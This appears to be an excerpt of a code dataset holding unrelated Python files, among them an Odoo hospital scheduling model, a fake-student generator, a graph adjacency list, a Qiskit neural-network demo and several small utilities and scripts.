self.en_passant,\n str(self.halfmove_clock),\n str(self.fullmove_number)]))\n return result\n","sub_path":"chesslib/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":17309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"162824094","text":"# -*- encoding:utf-8 -*-\nfrom datetime import datetime, timedelta\nimport time\nfrom odoo import api\nfrom odoo import fields, models\nfrom odoo.tools import DEFAULT_SERVER_DATE_FORMAT\n\n\n\nclass RegisterPlan(models.Model):\n _name = 'his.register_plan'\n _description = '队列计划'\n\n medical_date = fields.Date('就诊日期')\n department_id = fields.Many2one('hr.department', '科室')\n employee_id = fields.Many2one('hr.employee', '医生')\n line_ids = fields.One2many('his.register_plan_line', 'register_plan_id', '就诊记录明细')\n schedule_id = fields.Many2one('his.work_schedule', '安排', ondelete='cascade')\n\n\n @api.model\n def generate_register_plan(self):\n \"\"\"根据号源表和预约有效天数产生挂号计划表\"\"\"\n\n # # 在每天0点运行该计划\n # hour = (datetime.now() + timedelta(hours=8)).hour\n # if hour != 0:\n # return\n\n work_schedule_obj = self.env['his.work_schedule'] # 挂号安排\n register_plan_line_obj = self.env['his.register_plan_line']\n department_obj = self.env['hr.department']\n clinic_item_category_obj = self.env['his.clinic_item_category']\n schedule_shift_obj = self.env['his.schedule_shift']\n register_source_obj = self.env['his.register_source']\n\n appoint_day = self.env.user.company_id.appoint_day # 预约有效天数\n\n today = datetime.strptime(datetime.now().strftime(DEFAULT_SERVER_DATE_FORMAT), DEFAULT_SERVER_DATE_FORMAT) # 当前日期\n\n last_day = today + timedelta(days=appoint_day)\n\n for work_schedule in work_schedule_obj.search([('date', '>=', today.strftime(DEFAULT_SERVER_DATE_FORMAT)), ('date', '<=', last_day.strftime(DEFAULT_SERVER_DATE_FORMAT)), ('is_generate_register_plan', '=', False), ('is_outpatient', '=', True)]):\n # 把工作计划的班次按科室分组\n departments = {}\n for shift in work_schedule.shifts:\n departments.setdefault(shift.department_id, []).append(shift)\n\n for department in departments:\n # 创建挂号计划主记录\n register_plan = self.create({\n 'medical_date': work_schedule.date,\n 'department_id': department.id,\n 'employee_id': work_schedule.employee_id.id,\n 'schedule_id': work_schedule.id\n })\n medical_sort = 1 # 预约序号\n shifts = sorted(departments[department], key=lambda x: x.start_time) # 班次\n for shift in shifts:\n for register_source in shift.register_source_ids:\n\n register_plan_line_obj.create({\n 'register_plan_id': register_plan.id,\n 'medical_sort': medical_sort,\n 'shift_type_id': shift.shift_type_id.id,\n 'time_point_name': register_source.time_point_name,\n })\n\n medical_sort += 1\n\n work_schedule.is_generate_register_plan = True\n\n # # 下周一的日期\n # today = datetime.strptime(datetime.today().strftime(DEFAULT_SERVER_DATE_FORMAT), DEFAULT_SERVER_DATE_FORMAT)\n # week = int(today.strftime('%w'))\n # next_week = today + timedelta(days=7 - week + 1)\n\n # 科室排班生成计划\n for department in department_obj.search([('is_shift', '=', True), ('is_outpatient', '=', False)]):\n clinic_item_category = clinic_item_category_obj.search([('department_id', '=', department.id)])\n if clinic_item_category:\n date = today + timedelta(days=clinic_item_category.max_days)\n date_str = date.strftime(DEFAULT_SERVER_DATE_FORMAT)\n if work_schedule_obj.search([('department_id', '=', department.id), ('is_outpatient', '=', False), ('date', '=', date_str)]):\n continue\n\n work_schedule = work_schedule_obj.create({\n 'department_id': department.id,\n 'date': date_str,\n 'is_generate_register_plan': True,\n 'is_outpatient': False\n })\n week = date.strftime('%w')\n shifts = [shift for shift in department.shift_type_ids if shift.week_name == week]\n schedule_shifts = []\n for shift_type in shifts:\n schedule_shift = schedule_shift_obj.create({\n 'department_id': department.id,\n 'employee_id': False,\n 'schedule_id': work_schedule.id,\n 'shift_type_id': shift_type.id,\n 'start_time': shift_type.start_time,\n 'end_time': shift_type.end_time,\n 'register_time_interval': False,\n 'limit': shift_type.max_execute_count\n })\n schedule_shifts.append(schedule_shift)\n # 自动生成号源\n start = date + timedelta(hours=shift_type.start_time)\n end = date + timedelta(hours=shift_type.end_time)\n minute_interval = (\n shift_type.end_time * 60 - shift_type.start_time * 60) / shift_type.max_execute_count\n count = 1\n while start < end:\n register_source_obj.create({\n 'shift_id': schedule_shift.id,\n 'time_point_name': start.strftime('%H:%M'),\n 'department_id': department.id,\n 'employee_id': False,\n 'date': date_str,\n 'shift_type_id': shift_type.id\n })\n start += timedelta(minutes=int(minute_interval))\n if count >= shift_type.max_execute_count:\n break\n count += 1\n\n # 生成预约计划表\n # 创建挂号计划主记录\n register_plan = self.create({\n 'medical_date': work_schedule.date,\n 'department_id': department.id,\n 'schedule_id': work_schedule.id\n })\n medical_sort = 1 # 预约序号\n for shift in schedule_shifts:\n for register_source in shift.register_source_ids:\n register_plan_line_obj.create({\n 'register_plan_id': register_plan.id,\n 'medical_sort': medical_sort,\n 'shift_type_id': shift.shift_type_id.id,\n 'time_point_name': register_source.time_point_name,\n })\n medical_sort += 1\n\n\n else:\n # 产生近一周的排班\n for i in range(7):\n # date = next_week + timedelta(days=i)\n date = today + timedelta(days=i)\n date_str = date.strftime(DEFAULT_SERVER_DATE_FORMAT)\n if work_schedule_obj.search([('department_id', '=', department.id), ('is_outpatient', '=', False), ('date', '=', date_str)]):\n continue\n\n work_schedule = work_schedule_obj.create({\n 'department_id': department.id,\n 'date': date_str,\n 'is_generate_register_plan': True,\n 'is_outpatient': False\n })\n week = date.strftime('%w')\n shifts = [shift for shift in department.shift_type_ids if shift.week_name == week]\n if not shifts:\n shifts = [shift for shift in department.shift_type_ids if not shift.week_name]\n\n\n schedule_shifts = []\n for shift_type in shifts:\n if not shift_type.max_execute_count:\n continue\n\n schedule_shift = schedule_shift_obj.create({\n 'department_id': department.id,\n 'employee_id': False,\n 'schedule_id': work_schedule.id,\n 'shift_type_id': shift_type.id,\n 'start_time': shift_type.start_time,\n 'end_time': shift_type.end_time,\n 'register_time_interval': False,\n 'limit': shift_type.max_execute_count\n })\n schedule_shifts.append(schedule_shift)\n # 自动生成号源\n start = date + timedelta(hours=shift_type.start_time)\n end = date + timedelta(hours=shift_type.end_time)\n minute_interval = (shift_type.end_time * 60 - shift_type.start_time * 60) / shift_type.max_execute_count\n count = 1\n overage = 0\n while start < end:\n register_source_obj.create({\n 'shift_id': schedule_shift.id,\n 'time_point_name': start.strftime('%H:%M'),\n 'department_id': department.id,\n 'employee_id': False,\n 'date': date_str,\n 'shift_type_id': shift_type.id\n })\n minutes, overage = divmod(minute_interval + overage, 1)\n start += timedelta(minutes=minutes)\n if count >= shift_type.max_execute_count:\n break\n count += 1\n time.sleep(1)\n\n\n # 生成预约计划表\n # 创建挂号计划主记录\n register_plan = self.create({\n 'medical_date': work_schedule.date,\n 'department_id': department.id,\n 'schedule_id': work_schedule.id\n })\n medical_sort = 1 # 预约序号\n for shift in schedule_shifts:\n for register_source in shift.register_source_ids:\n register_plan_line_obj.create({\n 'register_plan_id': register_plan.id,\n 'medical_sort': medical_sort,\n 'shift_type_id': shift.shift_type_id.id,\n 'time_point_name': register_source.time_point_name,\n })\n medical_sort += 1\n\n\n\nclass RegisterPlanLine(models.Model):\n _name = 'his.register_plan_line'\n _description = '挂号计划表明细'\n _order = 'id asc'\n\n register_plan_id = fields.Many2one('his.register_plan', '挂号计划', ondelete='cascade')\n medical_sort = fields.Integer('预约序号')\n shift_type_id = fields.Many2one('his.shift_type', '班次')\n time_point_name = fields.Char('时间点')\n partner_id = fields.Many2one('res.partner', '患者')\n source = fields.Selection([('manual', '人工挂号'), ('app', 'APP')], '来源')\n register_time = fields.Datetime('预约/挂号时间')\n reserve_time_point_name = fields.Char('预约时间点')\n register_id = fields.Many2one('his.register', 'HIS挂号记录')\n state = fields.Selection([], '状态')\n\n\n\n","sub_path":"his_app_hcfy/models/register_plan.py","file_name":"register_plan.py","file_ext":"py","file_size_in_byte":11819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"204984054","text":"from faker import Faker\nimport json\n\nclass Student:\n \"\"\" creates a student \"\"\"\n def __init__(self, name, email, address, phone, social):\n self.name = name\n self.email = email\n self.address = address\n self.phone = phone\n self.social = social\n\n def __repr__(self):\n return f'Name: {self.name}\\n\\nEmail: {self.email} \\n\\nAddress: {self.address} \\n\\nPhone: {self.phone} \\n\\nSocial: {self.social} \\n\\n'\n\nclass School:\n \"\"\" creates a school \"\"\"\n def __init__(self, name):\n \"\"\" makes a school with a dictionary for fast access \"\"\"\n self.name = name\n self.students = dict()\n\n def new_student(self, name, email, address, phone, social):\n \"\"\" creates new student and adds it to school dictionary \"\"\"\n student = Student(name, email, address, phone, social)\n self.students[student.name] = student\n\n def list_students(self):\n \"\"\" list out students in school dictionary \"\"\"\n for kid in self.students:\n print(kid)\n\n def toJSON(self):\n return json.dumps(self, default=lambda o: o.__dict__, \n sort_keys=True, indent=4)\n\n def make_fake_school(self, amount):\n \"\"\" generates multiple student objects with fake credentials and stores them as jason in a txtfile\"\"\"\n fake = Faker()\n for i in range(1, amount+1):\n name = fake.name()\n address = fake.address()\n phone = fake.numerify(text=\"(###)-###-####\")\n social = fake.ssn()\n email = fake.email()\n self.new_student(name, email, address, phone, social)\n with open(\"school.json\", \"w\") as f:\n f.write(self.toJSON())\n","sub_path":"creator.py","file_name":"creator.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"130473320","text":"#!/usr/bin/python3\n\n# TPC2 -> Em vez de split usar re.findall() \nimport fileinput\nimport re\n\t\ncounter = {}\t\n\nfor text in fileinput.input():\n\ttext = text.strip()\n\t\n\tlista = re.findall(r\"\\w+\",text)\n\n\tfor i in lista:\n\t\tif len(i) > 0:\n\t\t\tcounter[i] = counter.get(i,0) + 1\n\nfor key, val in sorted(counter.items(), key=lambda x : x[1], reverse=True):\n\tprint(key, ' - ', val)","sub_path":"SPLN/TPC/TPC2/findall.py","file_name":"findall.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"66413727","text":"from sqlalchemy import orm\n\nfrom flask_cot.db import db\nfrom flask_cot.db.mixins import TimestampMixin, CRUDMixin\n\n\nclass LeaderboardEntryDb(TimestampMixin, CRUDMixin, db.Model):\n \"\"\"docstring for LeaderboardEntry.\"\"\"\n __abstract__ = True\n __base_tablename__ = 'leaderboard_entries'\n id = db.Column(db.CHAR(36), nullable=False, primary_key=True)\n leaderboard_id = db.Column(db.CHAR(36), nullable=True)\n _dim_1 = db.Column(db.Integer(), nullable=True)\n _dim_2 = db.Column(db.Integer(), nullable=True)\n _dim_3 = db.Column(db.Integer(), nullable=True)\n _dim_4 = db.Column(db.VARCHAR(255), nullable=True)\n _dim_5 = db.Column(db.VARCHAR(255), nullable=True)\n user_id = db.Column(db.CHAR(36), nullable=True)\n display_name = db.Column(db.VARCHAR(255), nullable=True)\n display_avatar = db.Column(db.VARCHAR(255), nullable=True)\n score_a = db.Column(db.Integer(), nullable=False, default=0)\n score_b = db.Column(db.Integer(), nullable=False, default=0)\n\n def __repr__(self):\n return '' % self.display_name, self.id\n","sub_path":"leaderboards/models/db/leaderboard_entry.py","file_name":"leaderboard_entry.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"303076620","text":"'''\ndoes a few things. First, it counts the total number of the 4 orientations of read pairs (left-most first, ++, +-, -+, --). \nThis is Erez's in-in, in-out, out-in, out-out . Second, it counts the same for only reads that with distances less than 2000 bp, \nand prints out a file with the distances for the four types.\n'''\nfrom optparse import OptionParser\nimport sys\nimport re\nimport gzip\nimport random\nfrom random import randint\nfrom random import shuffle\nfrom numpy import percentile\n\ndef parse_options():\n\tparser = OptionParser()\n\tparser.add_option(\"-f\", \"--infile\", dest=\"filename\",\n\t\t\t\t\t help=\"input file: paired mapped\", metavar=\"INFILE\")\n\tparser.add_option(\"-o\", \"--outfile\", dest=\"outfile\",\n\t\t\t\t\t help=\"outfile stem\", metavar=\"OUTFILE\")\n\t(options, args) = parser.parse_args()\n\treturn options\n\n\n\noptions = parse_options()\npp_count = 0\npm_count = 0\nmp_count = 0\nmm_count = 0\nplus_plus = []\nplus_minus = []\nminus_plus = []\nminus_minus = []\n\nf = options.filename\nif (f[-2:] == 'gz'):\n\tinfile = gzip.open(f, 'rt')\nelse:\n\tinfile = open(options.filename,'r')\n\nfor line in infile:\n\titems = line.split()\n\tLmost_strand = ''\n\tRmost_strand = ''\n\tchr1 = items[2]\n\tchr2 = items[5]\n\tpos1 = int(items[3])\n\tpos2 = int(items[6])\n\tif (chr1 == chr2):\n\t\tsize = abs(pos1 - pos2)\n\t\tif (pos1 < pos2):\n\t\t\tLmost_strand = items[1]\n\t\t\tRmost_strand = items[4]\n\t\tif (pos1 > pos2):\n\t\t\tLmost_strand = items[4]\n\t\t\tRmost_strand = items[1]\n\t\t\n\t\tif (Lmost_strand == '+' and Rmost_strand == '+'):\n\t\t\tif(size < 2000): plus_plus.append(size)\n\t\t\tpp_count += 1\n\t\tif (Lmost_strand == '+' and Rmost_strand == '-'):\n\t\t\tif(size < 2000): plus_minus.append(size)\n\t\t\tpm_count += 1\n\t\tif (Lmost_strand == '-' and Rmost_strand == '+'):\n\t\t\tif(size < 2000): minus_plus.append(size)\n\t\t\tmp_count += 1\n\t\tif (Lmost_strand == '-' and Rmost_strand == '-'):\n\t\t\tif(size < 2000): minus_minus.append(size)\n\t\t\tmm_count += 1\n\ninfile.close()\n\nmax_pp = len(plus_plus)\nmax_pm = len(plus_minus)\nmax_mp = len(minus_plus)\nmax_mm = len(minus_minus)\n\nmax_entry = max(max_pp, max_pm, max_mp, max_mm)\n\n\nprint('2000 counts: ' + str(max_pp) + '\\t' + str(max_pm) + '\\t' + str(max_mp) + '\\t' + str(max_mm) + '\\n')\nprint('Total counts: ' + str(pp_count) + '\\t' + str(pm_count) + '\\t' + str(mp_count) + '\\t' + str(mm_count) + '\\n')\n","sub_path":"QC_4way_orientations.py","file_name":"QC_4way_orientations.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"425534718","text":"\"\"\"Implementation file for Fixed Wireless HSS ingest.\n\n\"\"\"\nimport os\nimport datetime\nfrom logga import log\n\nimport pyrob.common\nimport pyrob.loads.fixed_wireless_common\n\n\nclass Hss(pyrob.loads.fixed_wireless_common.Base):\n \"\"\"HSS load implementation.\n\n \"\"\"\n def __init__(self, table=None, debug=False, dry=False):\n \"\"\":class:`Hss` initialisation.\n\n **Kwargs:**\n *table*: :mod:`pyrob.schema.ipact_stg` table class mapping\n\n *debug*: provide additional logging output (default ``False``)\n\n *dry*: only report, do not execute (default ``False``)\n\n \"\"\"\n super(Hss, self).__init__(table=table, debug=debug, dry=dry)\n\n @staticmethod\n def global_elements(tree):\n \"\"\"Handle global XML token values.\n\n For parameters and return values, see\n :meth:`extract_value_based_element`\n\n \"\"\"\n data = {}\n\n nedn = None\n\n nedn_elements = tree.xpath('./neid/nedn')\n if len(nedn_elements):\n nedn = nedn_elements[0].text\n\n data['nedn'] = nedn\n\n return data\n\n def insert(self, process_id, bucket_size=10000, arraysize=10000):\n insert_counter = 0\n rows = []\n counter = 0\n for headers, results in self.source_remote_data(arraysize):\n for row in results:\n data = self.convert_columns(headers, row)\n\n # Drop the unique-ifying column.\n data.pop('dummy_id', None)\n\n data['ipact_dl_process_id'] = process_id\n data['record_created_date'] = datetime.datetime.utcnow()\n data['record_created_userid'] = 105\n rows.append(data)\n counter += 1\n\n if counter >= bucket_size:\n super(Hss, self).insert(rows)\n insert_counter += len(rows)\n counter = 0\n del rows[:]\n\n # Get the laggards.\n super(Hss, self).insert(rows)\n insert_counter += len(rows)\n\n return insert_counter\n","sub_path":"pyrob/loads/fixed_wireless/hss.py","file_name":"hss.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"506838269","text":"class node:\n def __init__(self,data,next):\n self.data=data\n self.next=next\n\n def has_next(self):\n if self.next ==None:\n return False\n return True\n\nclass weighted_node:\n \n def __init__(self,data,next,weight):\n self.data=data\n self.next=next\n self.weight=weight\n\n def has_next(self):\n if self.next == None:\n return False\n return True\n\nclass graph:\n #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Methods for external use~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n # Constructor\n def __init__(self,max_size,directed,weighted):\n self.max_size=max_size\n self.directed=directed\n self.weighted=weighted\n self.graph = self.initialize_graph()\n\n #Add method for out of class use\n def add(self,v1,v2,weight):\n assert v1 [Node: {currNode.data} - Weight: {currNode.weight}]\")\n currNode=currNode.next\n line_str+=\"\\n\"\n print(line_str)\n else:\n for x in range(len(self.graph)):\n line_str = \"\"\n line_str += f\"{x}: \"\n currNode = self.graph[x]\n currNode=currNode.next\n while currNode != None:\n line_str += (f\"-> [Node: {currNode.data}]\")\n currNode=currNode.next\n line_str+=\"\\n\"\n print(line_str)\n #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Methods for internal use~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n #Method to initialize the array of linked lists\n def initialize_graph(self):\n arr=[]\n if self.weighted:\n for x in range(self.max_size):\n arr.append(weighted_node(None,None,None))\n else:\n for x in range(self.max_size):\n arr.append(node(None,None))\n return arr \n\n #Connects 2 vertices with an unweighted edge\n def connect_vertices_unweighted(self,v1,v2):\n currNode = self.graph[v1]\n while(currNode.has_next()):\n currNode=currNode.next\n currNode.next=node(v2,None)\n\n #Connects 2 vertices with a weighted edge\n def connect_vertices_weighted(self,v1,v2,weight):\n currNode = self.graph[v1]\n while(currNode.has_next()):\n currNode=currNode.next\n currNode.next=weighted_node(v2,weight,None)\n \n #Adds edge between 2 vertices with an unweighted edge\n def add_unweighted(self,v1,v2):\n #Connect v1 -> v2\n self.connect_vertices_unweighted(v1,v2)\n #Connects v2 -> v1 if graph is not directed\n if not self.directed:\n self.connect_vertices_unweighted(v2,v1)\n\n #Adds edge between 2 vertices with a weighted edge\n def add_weighted(self,v1,v2,weight):\n #Connect v1 -> v2\n self.connect_vertices_weighted(v1,v2,weight)\n #Connects v2 -> v1 if graph is not directed\n if not self.directed:\n self.connect_vertices_weighted(v2,v1,weight)\n\n #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~","sub_path":"graph-algos/adjacency_list.py","file_name":"adjacency_list.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"160721563","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom torch import Tensor\nfrom torch.nn import Linear, CrossEntropyLoss, MSELoss\nfrom torch.optim import LBFGS\n\nfrom qiskit import Aer, QuantumCircuit\nfrom qiskit.utils import QuantumInstance\nfrom qiskit.opflow import AerPauliExpectation\nfrom qiskit.circuit import Parameter\nfrom qiskit.circuit.library import RealAmplitudes, ZZFeatureMap\nfrom qiskit_machine_learning.neural_networks import CircuitQNN, TwoLayerQNN\nfrom qiskit_machine_learning.connectors import TorchConnector\n\nqi = QuantumInstance(Aer.get_backend('statevector_simulator')) # Quantum Backend \n\n# Generate a simple random data set: \nnum_inputs = 2\nnum_samples = 20\nX = 2*np.random.rand(num_samples, num_inputs) - 1\ny01 = 1*(np.sum(X, axis=1) >= 0) # in { 0, 1}\ny = 2*y01-1 # in {-1, +1}\n\nX_ = Tensor(X)\ny01_ = Tensor(y01).reshape(len(y)).long()\ny_ = Tensor(y).reshape(len(y), 1)\n\nfor x, y_target in zip(X, y):\n if y_target == 1:\n plt.plot(x[0], x[1], 'bo')\n else:\n plt.plot(x[0], x[1], 'go')\nplt.plot([-1, 1], [1, -1], '--', color='black')\nplt.show()\n\n# set up QNN\nqnn1 = TwoLayerQNN(num_qubits=num_inputs, quantum_instance=qi)\n\n# set up PyTorch module\ninitial_weights = 0.1*(2*np.random.rand(qnn1.num_weights) - 1)\nmodel1 = TorchConnector(qnn1, initial_weights=initial_weights) \n\n# define optimizer and loss\noptimizer = LBFGS(model1.parameters())\nf_loss = MSELoss(reduction='sum')\n\n# start training\nmodel1.train() # set model to training mode\n\n# define objective function\ndef closure():\n optimizer.zero_grad() # initialize gradient\n loss = f_loss(model1(X_), y_) # evaluate loss function\n loss.backward() # backward pass\n print(loss.item()) # print loss\n return loss\n\n# run optimizer\noptimizer.step(closure)\n\n\n# evaluate model and compute accuracy\ny_predict = []\nfor x, y_target in zip(X, y):\n output = model1(Tensor(x))\n y_predict += [np.sign(output.detach().numpy())[0]]\n\nprint('Accuracy:', sum(y_predict == y)/len(y))\n\n# plot results\n# red == wrongly classified\nfor x, y_target, y_p in zip(X, y, y_predict):\n if y_target == 1:\n plt.plot(x[0], x[1], 'bo')\n else:\n plt.plot(x[0], x[1], 'go')\n if y_target != y_p:\n plt.scatter(x[0], x[1], s=200, facecolors='none', edgecolors='r', linewidths=2)\nplt.plot([-1, 1], [1, -1], '--', color='black')\nplt.show()","sub_path":"old/NN2.py","file_name":"NN2.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"249880784","text":"from PyQt4.QtGui import QFont, QHBoxLayout, QFrame\nfrom PyQt4 import QtCore\n\nmonospace_font = QFont('Monospace')\nmonospace_font.setStyleHint(QFont.TypeWriter)\n\nscript_file_filter = 'Coinscripts (*.coinscript);;Text files (*.txt);;All files (*.*)'\n\ndef floated_buttons(btns, left=False):\n \"\"\"Returns a HBoxLayout with buttons floated to the right or left.\"\"\"\n hbox = QHBoxLayout()\n for b in btns:\n hbox.addWidget(b)\n if left:\n hbox.addStretch(1)\n else:\n hbox.insertStretch(0, 1)\n return hbox\n\nclass Separator(QFrame):\n def __init__(self, parent=None):\n super(Separator, self).__init__(parent)\n self.setFrameShape(QFrame.HLine)\n self.setFrameShadow(QFrame.Raised)\n self.setLineWidth(6)\n self.setMidLineWidth(2)\n\n def sizeHint(self):\n return QtCore.QSize(6, 8)\n\nhashmal_style = '''\n\nQStatusBar[hasError=true], QLineEdit[hasError=true] {\n background: rgba(255, 0, 0, 25%);\n}\n'''\n","sub_path":"hashmal_lib/gui_utils.py","file_name":"gui_utils.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"348531237","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nExercise: simple divide\r\n\r\n\"\"\"\r\n\r\ndef fancy_divide(list_of_numbers, index):\r\n denom = list_of_numbers[index]\r\n return [simple_divide( item, denom) for item in list_of_numbers]\r\n\r\n\r\ndef simple_divide(item, denom):\r\n \r\n try:\r\n return item / denom\r\n \r\n except ZeroDivisionError:\r\n return 0\r\n \r\n\r\n \r\n except Exception as ex:\r\n print(ex)\r\n \r\n \r\n\r\nprint(fancy_divide([0, 2, 4], 1))","sub_path":"Week_4-Good_Programming_Practices/Exercise_simple _divide.py","file_name":"Exercise_simple _divide.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"624220237","text":"import numpy as np\nimport cv2 as cv\nfrom mylib import h5Handler\nfrom mylib import read_frame\n\ndump_path = '../preProcess/dump_dir.txt'\ndec_path = '../../raw_data/dec.yuv'\ngt_path = '../../raw_data/video.yuv'\ntarget_path = '../img/'\n\nplanar_h5_path = '../../train64/planar.h5'\ndc_h5_path = '../../train64/dc.h5'\nangle_h5_path = '../../train64/angle.h5'\n\nheight = 1024\nwidth = 1792\nblock_size = 32\n\n# define 3 mode\nplanar_mode = 0\ndc_mode = 1\nangle_mode = 2\n\n\n\ndef filter_sample(img, threshold):\n # var = np.var(img)\n # if var > threshold:\n # return True\n # else:\n # return False\n pass\n\ninput = np.zeros([96, 96])\nlabel = np.zeros([32, 32])\ntest_img = np.zeros([64,64])\ndcvars = []\nplanarvars = []\nanglevars = []\n\nplanarinput = np.zeros([2000, 96, 96])\nplanarlabel = np.zeros([2000, 32, 32])\ndcinput =np.zeros([2000, 96, 96])\ndclabel = np.zeros([2000, 32, 32])\nangleinput = np.zeros([2000, 96, 96])\nanglelabel = np.zeros([2000, 32, 32])\n\nplanar_handler = h5Handler(planar_h5_path)\ndc_handler = h5Handler(dc_h5_path)\nangle_handler = h5Handler(angle_h5_path)\n# # --------------for debug------------------\n# cnt = 0\n# datas = np.zeros([20, 3072, 1, 1])\n# labels = np.zeros([20, 1024, 1, 1])\n# flag = True \n# handler = h5Handler('/home/hyz/lab/intra/train/train.h5') \n# # --------------for debug------------------\n\nwith open(dump_path) as f:\n while True:\n line = f.readline()\n if line == '':\n break\n [f_id, y, x, mode] = line.split()\n y = int(y)\n x = int(x)\n f_id = int(f_id)\n mode = int(mode)\n # --------------for debug------------------\n \t#if f_id > 5:\n # break\n # --------------for debug------------------\n\n if y == 0 and x == 0:\n pc = 0\n dc = 0\n ac = 0\n\n gt_img = read_frame(gt_path, f_id, height, width)\n dec_img = read_frame(dec_path, f_id, height, width)\n print(f_id)\n # Abort the most outsize row and column\n if x == 0 or y == 0 or x == 992 or y == 1760:\n continue\n # print([x, y])\n input = dec_img[x-block_size:x+2*block_size,y-block_size:y+2*block_size] / 255.0\n label = gt_img[x:x+block_size,y:y+block_size] / 255.0\n\n\n # --------------for debug------------------(write data to hdf5 file)\n # datas[cnt:cnt + 1, :, :, :] = input / 255.0\n # labels[cnt:cnt + 1, :, :, :] = label / 255.0\n # cnt += 1\n # if cnt == 20:\n # if flag:\n # handler.write(datas, label, create=True)\n # print('$$$$$$$$$$$ new h5 file constructed $$$$$$$$$$$$')\n # flag = False\n # else:\n # handler.write(datas, labels, create=False)\n # print('$$$$$$$$$$$ add data to existed h5 file constructed $$$$$$$$$$$$')\n # cnt = 0\n # --------------for debug------------------(write data to hdf5 file)\n\n if mode == planar_mode:\n planarinput[pc, :, :] = input\n planarlabel[pc, :, :] = label\n pc = pc + 1\n planarvars.append(np.var(test_img))\n elif mode == dc_mode:\n dcinput[dc, :, :] = input\n dclabel[dc, :, :] = label\n dc = dc + 1\n dcvars.append(np.var(test_img))\n else:\n angleinput[ac, :, :] = input\n anglelabel[ac, :, :] = label\n ac = ac + 1\n anglevars.append(np.var(test_img))\n # cv.imwrite(target_path + str(y) + '_' + str(x) + '.png', test_img)\n\n # Then check if we have arrive the final block of this frame\n if y == 1728 and x == 960:\n # now begin to write data to the h5 file\n if f_id == 0:\n # create mode\n planar_handler.write(planarinput[:pc,:,:], planarlabel[:pc,:,:], create=True)\n dc_handler.write(dcinput[:dc,:,:], dclabel[:dc,:,:], create=True)\n angle_handler.write(angleinput[:ac,:,:], anglelabel[:ac,:,:], create=True)\n else:\n # append mode\n planar_handler.write(planarinput[:pc,:,:], planarlabel[:pc,:,:], create=False)\n dc_handler.write(dcinput[:dc,:,:], dclabel[:dc,:,:], create=False)\n angle_handler.write(angleinput[:ac,:,:], anglelabel[:ac,:,:], create=False)\n print('In this frame %d: planar: %d, dc: %d, angle: %d'%(f_id, pc, dc, ac))\n\n\nprint('------------ print statistic data -------------')\nprint('planar var: ', np.mean(planarvars), len(planarvars))\nprint('dc var: ', np.mean(dcvars), len(dcvars))\nprint('angle var: ', np.mean(anglevars), len(anglevars))\n\n\n","sub_path":"tf64/generate_data.py","file_name":"generate_data.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"113020428","text":"\"\"\" Image downloader for Facebook \"\"\"\n# -*- coding: utf-8 -*-\nimport json\nimport logging\nimport timeit\nfrom argparse import ArgumentParser\n\nfrom lib.const import Files\nfrom lib.gallery_crawler import GalleryCrawler\n\n\ndef main():\n \"\"\" Traverse the galleries \"\"\"\n args = _parse_args()\n try:\n with open(Files.OPTIONS.value) as options_file:\n options = json.load(options_file)\n if args.url:\n options['start_images'] = args.url,\n crawler = GalleryCrawler(options)\n crawler.run()\n except FileNotFoundError:\n logging.error(\n \"You should create your own %s from %s!\",\n Files.OPTIONS.value,\n Files.OPTIONS_TEMPLATE.value\n )\n\n\ndef _parse_args():\n parser = ArgumentParser()\n parser.add_argument('-u', '--url', type=str, help='Start image URL.')\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n print(\"[Facebook Gallery Downloader v0.3]\")\n START = timeit.default_timer()\n main()\n STOP = timeit.default_timer()\n print(\"[ Time taken: %ss ]\" % str(STOP - START))\n input(\"Press any key to continue...\")\n","sub_path":"traverse_gallery.py","file_name":"traverse_gallery.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"612699867","text":"# convert 123 to \"123\"\n# mod 3\n# integer division\n\n\ndef num(n):\n str = \"\"\n while n > 0:\n new_num = n % 10\n str = chr(48 + new_num) + str\n n = n // 10\n return str\n\n\ns = num(123)\nprint(s)\n","sub_path":"convert_int_to_str.py","file_name":"convert_int_to_str.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} 